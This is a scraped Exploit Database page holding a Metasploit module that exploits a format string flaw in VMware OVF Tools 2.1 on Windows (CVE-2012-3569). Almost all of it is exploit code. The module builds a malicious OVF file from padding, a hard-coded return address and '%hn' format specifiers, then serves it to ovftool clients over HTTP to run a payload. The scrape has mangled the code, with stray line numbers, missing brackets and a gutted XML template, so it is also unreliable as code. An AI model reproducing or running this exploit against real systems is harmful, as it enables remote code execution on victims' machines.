VMware OVF Tools – Format String (Metasploit) (1)

Exploit Database
106 阅读

作者： Metasploit

日期： 2013-02-06
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/24460/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info={})

super(update_info(info,

'Name' => 'VMWare OVF Tools Format String Vulnerability',

'Description'=> %q{

This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for

Windows. The vulnerability occurs when printing error messages while parsing a

a malformed OVF file. The module has been tested successfully with VMWare OVF Tools

2.1 on Windows XP SP3.

'License'=> MSF_LICENSE,

'Author' =>

[

'Jeremy Brown', # Vulnerability discovery

'juan vazquez'# Metasploit Module

'References' =>

[

[ 'CVE', '2012-3569' ],

[ 'OSVDB', '87117' ],

[ 'BID', '56468' ],

[ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]

'Payload'=>

{

'DisableNops'=> true,

'BadChars' =>

(0x00..0x08).to_a.pack("C*") +

"\x0b\x0c\x0e\x0f" +

(0x10..0x1f).to_a.pack("C*") +

(0x80..0xff).to_a.pack("C*") +

"\x22",

'StackAdjustment' => -3500,

'PrependEncoder'=> "\x54\x59", # push esp # pop ecx

'EncoderOptions'=>

{

'BufferRegister' => 'ECX',

'BufferOffset' => 6

}

'DefaultOptions' =>

{

'InitialAutoRunScript' => 'migrate -f'

'Platform' => 'win',

'Targets'=>

[

# vmware-ovftool-2.1.0-467744-win-i386.msi

[ 'VMWare OVF Tools 2.1 on Windows XP SP3',

{

'Ret'=> 0x7852753d,# call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1

'AddrPops' => 98,

'StackPadding' => 38081,

'Alignment'=> 4096

}

'Privileged' => false,

'DisclosureDate' => 'Nov 08 2012',

'DefaultTarget'=> 0))

end

def ovf

my_payload = rand_text_alpha(4) # ebp

my_payload << [target.ret].pack("V") # eip # call esp

my_payload << payload.encoded

fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)

fs << rand_text_alpha(target['Alignment']) # Align to 0x11000

fs << my_payload

# 65536 => 0x10000

# 27=> Error message prefix length

fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))

fs << "%08x" * target['AddrPops'] # Reach saved EBP

fs << "%hn" # Overwrite LSW of saved EBP with 0x1000

ovf_file = <<-EOF

<?xml version="1.0" encoding="UTF-8"?>

<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1"

xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common"

xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1"

xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData"

xmlns:vmw="http://www.vmware.com/schema/ovf"

xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

</References>

<Info>Virtual disk information</Info>

</DiskSection>

<Info>A virtual machine</Info>

</VirtualSystem>

</Envelope>

EOF

ovf_file

end

def on_request_uri(cli, request)

agent = request.headers['User-Agent']

uri = request.uri

if agent !~ /VMware-client/ or agent !~ /ovfTool/

print_status("User agent #{agent} not recognized, answering Not Found...")

send_not_found(cli)

end

if uri =~ /.mf$/

# The manifest file isn't required

print_status("Sending Not Found for Manifest file request...")

send_not_found(cli)

end

print_status("Sending OVF exploit...")

send_response(cli, ovf, {'Content-Type'=>'text/xml'})

end